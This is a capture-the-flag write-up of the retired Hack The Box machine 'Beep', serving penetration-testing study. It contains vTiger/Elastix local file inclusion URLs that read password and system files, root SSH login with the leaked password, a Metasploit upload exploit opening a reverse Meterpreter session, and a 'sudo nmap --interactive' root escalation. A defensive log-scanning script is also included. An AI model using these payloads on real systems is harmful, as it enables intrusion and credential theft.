Hack The Box (HTB) is an online platform allowing you to test your penetration testing skills. It contains several challenges that are constantly updated. Some of them simulate real-world scenarios and some of them lean more towards a CTF style of challenge.
Note. Only write-ups of retired HTB machines are allowed.
Beep is described as having a very large list of running services, which can make it a bit challenging to find the correct entry method. The machine can be a little overwhelming for some as there are many potential attack vectors.
We will use the following tools to pwn the box from a Kali Linux box:
nmap
zenmap
dirbuster
searchsploit
metasploit
Step 1 - Scanning the network
The first step before exploiting a machine is to do a little bit of scanning and reconnaissance.
This is one of the most important parts as it will determine what you can try to exploit afterwards. It is always better to spend more time on that phase to get as much information as possible.
I will use Nmap (Network Mapper), which is a free and open source utility for network discovery and security auditing. It uses raw IP packets to determine what hosts are available on the network, what services those hosts are offering, what operating systems they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.
There are many commands you can use with this tool to scan the network. If you want to learn more about it, you can have a look at the documentation here.
I use the following command to get a basic idea of what we are scanning:
nmap -sV -O -F --version-light 10.10.10.7
-sV: Probe open ports to determine service/version info
-O: Enable OS detection
-F: Fast mode - Scan fewer ports than the default scan
--version-light: Limit to most likely probes (intensity 2)
10.10.10.7: IP address of the Beep box
You can also use Zenmap, which is the official Nmap Security Scanner GUI. It is a multi-platform, free and open source application which aims to make Nmap easy for beginners to use while providing advanced features for experienced Nmap users.
I use a different set of options to perform an intensive scan:
nmap -A -v 10.10.10.7
-A: Enable OS detection, version detection, script scanning, and traceroute
-v: Increase verbosity level
10.10.10.7: IP address of the Beep box
If you find the results a little bit too overwhelming, you can move to the Ports/Hosts tab to only get the open ports.
We can see that there are 12 open ports:
Port 22. Secure Shell (SSH): secure logins, file transfers (scp, sftp) and port forwarding
Port 25. Simple Mail Transfer Protocol (SMTP), used for email routing between mail servers
Port 80. Hypertext Transfer Protocol (HTTP). Here it's an Apache httpd 2.2.3
Port 110. Post Office Protocol, version 3 (POP3)
Port 111. Open Network Computing Remote Procedure Call (ONC RPC, sometimes referred to as Sun RPC)
Port 143. Internet Message Access Protocol (IMAP), management of electronic mail messages on a server
Port 443. Hypertext Transfer Protocol over TLS/SSL (HTTPS)
Port 993. Internet Message Access Protocol over TLS/SSL (IMAPS)
Port 995. Post Office Protocol 3 over TLS/SSL (POP3S)
Port 3306. MySQL database system
Port 4445. I2P HTTP/S proxy
Port 10000. Webmin, web-based Unix/Linux system administration tool (default port)
Nmap finds quite a long list of services. For now, Apache, which is running on ports 80 and 443, will be the primary target.
Step 2 - Enumerating the directories
Still in the scanning and reconnaissance phase, I now use DirBuster. DirBuster is a multi-threaded Java application designed to brute force directory and file names on web/application servers.
You can launch DirBuster by typing this command in the terminal:
dirbuster
or by searching for the application.
The application looks like this, where you can specify the target URL. In our case it will be https://10.10.10.7. You can select a file with the list of dirs/files by clicking the Browse button.
I use directory-list-2.3-medium.txt for this search.
DirBuster finds a huge list of directories with several content management systems and open source applications. Amongst the results there are several vulnerabilities that can lead to a shell.
Step 3 - Visiting the website
Let's try port 80 and visit http://10.10.10.7
The website redirects to https://10.10.10.7 and we need to add a security exception for the website to continue.
We finally land on the website, which is an Elastix Login Portal. Elastix is a unified communications server software that brings together IP PBX, email, IM, faxing and collaboration functionality. It has a web interface and includes capabilities such as call center software with predictive dialling.
An IP PBX ("Internet Protocol private branch exchange") is a system that connects telephone extensions to the public switched telephone network (PSTN) and provides internal communication for a business.
If you want to learn more about Elastix, you can have a look here.
I try the default credentials, but they don't seem to work:
Username: admin
Password: palosanto
Having a look at the source code doesn't help either.
I will use Searchsploit to check if there's any known vulnerability in Elastix. Searchsploit is a command line search tool for Exploit Database.
I use the following command:
searchsploit elastix
We can see several vulnerabilities, but we will examine the 'graph.php' Local File Inclusion with this command:
searchsploit -x 37637.pl
We have a summary of the exploit and the code.
The LFI exploit is the following:
/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action
An attacker can use Local File Inclusion (LFI) to trick the web application into exposing or running files on the web server. An LFI attack may lead to information disclosure, remote code execution, or even Cross-site Scripting (XSS).
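From the defender's side, the two LFI requests used in this write-up (graph.php with current_language, and the sortfieldsjson.php module_name variant in Step 4b) leave a recognisable trace in the web server's access log. The following is an added example, not code from the article, Elastix or vTiger: it scans Apache-style log lines for traversal sequences, the %00 truncation trick and reads of sensitive files. The log lines, timestamps and client address are constructed, and the sensitive-file list is an assumption.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Files an LFI on this box aims at (assumed list; amportal.conf and manager.conf leak the password here).
SENSITIVE_FILES = ("/etc/passwd", "/etc/shadow", "/etc/amportal.conf", "/etc/asterisk/manager.conf")
# Apache combined-log prefix: client, ident, user, [timestamp] "METHOD target proto" status
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def decode_fully(value, rounds=3):
    """Strip up to `rounds` layers of URL encoding so %252e%252e%252f is seen as ../ too."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def analyse_request(target):
    """Return [(param, [indicator, ...]), ...] for every query parameter that looks like LFI."""
    findings = []
    # parse_qsl already removes one layer of percent-encoding (%00 -> "\x00").
    for name, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = decode_fully(raw)
        indicators = []
        if re.search(r'\.\.[/\\]', value):
            indicators.append("traversal")
        if "\x00" in value:
            # PHP < 5.3.4 truncates the include path at the NUL, dropping any suffix the app appends.
            indicators.append("null-byte")
        hits = [f for f in SENSITIVE_FILES if f in value]
        if hits:
            indicators.append("sensitive-file:" + hits[0])
        if indicators:
            findings.append((name, indicators))
    return findings

def scan_log(lines):
    """Return one alert record per request carrying at least one LFI indicator."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and (hits := analyse_request(m["target"])):
            alerts.append({"ip": m["ip"], "path": urlsplit(m["target"]).path,
                           "status": int(m["status"]), "indicators": hits})
    return alerts

# Constructed sample log: one benign request, the two URLs from the write-up, one double-encoded probe.
SAMPLE_LOG = [
    '10.10.14.10 - - [10/Jan/2020:10:01:02 +0000] "GET /vtigercrm/index.php?module=Accounts&action=index HTTP/1.1" 200 5120',
    '10.10.14.10 - - [10/Jan/2020:10:02:11 +0000] "GET /vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action HTTP/1.1" 200 2210',
    '10.10.14.10 - - [10/Jan/2020:10:03:45 +0000] "GET /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/asterisk/manager.conf%00 HTTP/1.1" 200 812',
    '10.10.14.10 - - [10/Jan/2020:10:04:01 +0000] "GET /vtigercrm/graph.php?current_language=..%252f..%252f..%252fetc%252fpasswd%2500 HTTP/1.1" 200 1460',
]

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

A 200 status on one of these requests is the signal that the inclusion actually succeeded, which is what distinguishes the leak of amportal.conf from a blocked probe.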
You can also check the Exploit Database to find the exploit.
You will get the same results as on the terminal. If you navigate to 2.0 - 'graph.php' Local File Inclusion, you will have a description of the exploit.
If you remember from step 2, the directory enumeration flagged a vTiger CRM.
vTiger CRM is an integrated customer relationship management (CRM) application that can be used on the intranet or from the Internet using a browser. It is distributed under a free license.
If you want to learn more about vTiger CRM, you can have a look here.
You can also read more about the integration between Elastix and vTigerCRM here.
Step 4 - Trying the Elastix LFI exploit
Let's navigate to
https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action
If you can't read anything, you can prettify the file by viewing the page source.
I find a password: jEhdIekWmdjE
If you remember from step 1, the nmap scan flagged port 22 as open. Let's try the newly found password on it.
Step 5 - Connecting to SSH
Let's connect over SSH with the following command:
ssh root@10.10.10.7
I try the password and I'm in!
Step 6 - Looking for the root.txt flag
I can now look for the first flag, root.txt.
I use the following command to check who I am on this machine:
whoami
I have root access to the machine. I got the power!
I use the following command to check where I am on the machine:
pwd
I'm in /root and by doing
ls
I find the root.txt file! To read the content of the file I use the command
cat root.txt
Now that we have the root flag, let's find the user flag!
Step 7 - Looking for the user.txt flag
I need to navigate back to the home directory by doing
cd /home
I then list all the files/folders and see there's a folder called fanis.
I navigate to this folder with
cd fanis
And when I list the files/folders, I can see the user.txt file!
To read the content of the file I use the command
cat user.txt
Congrats! You found both flags!
Variations for informational findings
Step 3b - Visiting the website
Let's navigate to
https://10.10.10.7/vtigercrm/
We can see the version of the application: vTiger CRM 5.1.0
I will use Searchsploit to check if there's any known vulnerability in vTigerCRM.
I use the following command:
searchsploit vtiger
We can see several vulnerabilities. I examine the Local File Inclusion with this command:
searchsploit -x 18770.txt
I have a summary of the exploit and the code.
The LFI exploit is the following:
/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00
You can also check the Exploit Database to find the exploit.
You will get the same results as on the terminal. If you navigate to vTiger 5.1.0 - Local File Inclusion, you will have a description of the exploit.
Step 4b - Doing more recon around the vTiger Asterisk default credentials
Let's navigate to
https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00
If you can't read anything, you can prettify the file by viewing the page source.
I also do some research on default credentials for vTiger and find some documentation around installing the vTiger Asterisk Connector.
If we modify the previous URL to
https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/asterisk/manager.conf%00
and navigate to this page (using the page source to prettify the output), I find a password: jEhdIekWmdjE
You can continue to Step 5 from there.
Variations using Metasploit, Meterpreter, nmap --interactive and Burp
Step 3c - Visiting the website
We know that the version of the application is vTiger CRM 5.1.0.
We will use Metasploit, which is a penetration testing framework that makes hacking simple. It's an essential tool for many attackers and defenders.
I launch Metasploit Framework on Kali and look for the command I should use to launch the exploit.
I find an interesting module, number 3:
exploit/multi/http/vtiger_soap_upload
This is the description of the exploit:
vTiger CRM allows a user to bypass authentication when requesting SOAP services. In addition, arbitrary file upload is possible through the AddEmailAttachment SOAP service. By combining both vulnerabilities an attacker can upload and execute PHP code. This module has been tested successfully on vTiger CRM v5.4.0 over Ubuntu 10.04 and Windows 2003 SP2.
I use the following command to select the exploit:
use exploit/multi/http/vtiger_soap_upload
I need to set up several options before launching the exploit.
I start by setting RHOSTS with the following command:
set RHOSTS 10.10.10.7/32
I set SSL and RPORT with
set SSL true
and
set RPORT 443
I run the exploit, but this time I need to set the correct LHOST (the listener address on my Kali box) with
set LHOST 10.10.14.10
Here is a sum up of all the commands.
I check the options.
I run the exploit with the command
run
I get this error message.
I set up the proxy with the following command:
set proxies http:127.0.0.1:8080
I check the options again.
I run the exploit but I get a new error message.
I set it with this command:
set ReverseAllowProxy true
I also need to set up Burp to proxy the exploit.
Burp Suite is a Java based web penetration testing framework. It has become an industry standard suite of tools used by information security professionals. Burp Suite helps identify vulnerabilities and verify attack vectors that are affecting web applications.
You can learn more on the official website here.
Open Burp and set the target to the website in Target > Scope > Target Scope > Include in scope > Edit.
I run the exploit in Metasploit and go back to Burp. I can see Burp intercepted the request.
I set the Intercept option to off.
Back in Metasploit, I finally get a Meterpreter session.
From the Offensive Security website, we get this definition for Meterpreter:
Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.
You can read more about Meterpreter here.
Step 4c - Looking for the user.txt flag
I navigate to the root directory to find the home folder. I then move to the home directory with
cd home
You can list files/folders with
ls -la
I find a folder called fanis. Let's see what's inside with
cd fanis
I list all files/folders and I find the user.txt flag. To read the content of the file I use the command
cat user.txt
Now that we have the user flag, let's find the root flag!
Step 5c - Looking for the root.txt flag
I can't access the root folder, but I can create a shell with the command
shell
If I check who I am on the machine, I get
If you do
sudo -l
you can see many NOPASSWD commands which can lead us to getting root.
Older versions of Nmap (2.02 to 5.21) had an interactive mode which allowed users to execute shell commands. Since Nmap is in the list of binaries that is executed with root privileges, it is possible to use the interactive console in order to run a shell with the same privileges.
Let's try it with the following command:
sudo nmap --interactive
The following command will give an elevated shell. You can read more on the Bourne shell here.
!sh
I check who I am on the machine, and I have root access.
I can now navigate to the root directory.
I find the root.txt.txt file!
To read the content of the file I use the command
cat root.txt
Congrats! You found both flags!
Please don't hesitate to comment, ask questions or share with your friends :)
You can see more of my articles here.
You can follow me on Twitter or on LinkedIn.
And don't forget to #GetSecure, #BeSecure & #StaySecure!
Other Hack The Box articles
Keep Calm and Hack The Box - Lame
Keep Calm and Hack The Box - Legacy
Keep Calm and Hack The Box - Devel
Translated from: https://www.freecodecamp.org/news/keep-calm-and-hack-the-box-beep/